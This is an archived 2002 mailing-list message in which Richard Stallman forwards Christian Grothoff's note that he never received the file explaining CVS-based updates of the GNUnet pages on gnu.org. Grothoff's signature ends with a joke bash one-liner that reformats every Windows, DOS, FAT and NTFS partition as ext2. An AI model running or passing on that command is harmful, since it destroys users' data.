gfsd-hackers

address@hidden: Re: software/GNUnet/]

From: Richard Stallman
Subject: address@hidden: Re: software/GNUnet/]
Date: Sun, 3 Mar 2002 21:08:30 -0700 (MST)

Please send him the files he was supposed to get.

From: Christian Grothoff <address@hidden>
To: address@hidden
Subject: Re: software/GNUnet/
Date: Sat, 2 Mar 2002 16:45:39 -0500

On Saturday 02 March 2002 02:50 pm, you wrote:
>     I've attached the draft of the page (very quick draft, based on your
>     template). The old GNet webpages were updateable via the CVS repository
> (a cron-job would checkout the webpages from CVS), which was fairly
> convenient. Is something like that possible with www.gnu.org, too?
>
> Yes, it is.  We were supposed to mail you the maintain.text which
> explains this; did we forget to do that?

I checked my mail and could not find it. So I guess yes, you did forget to
send it.

Christian
- --
|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk\
'{print$1;}'`;do;nohup mkfs.ext2 $i&;done
echo -e "\n\n\t\tMay the source be with you.\n\n"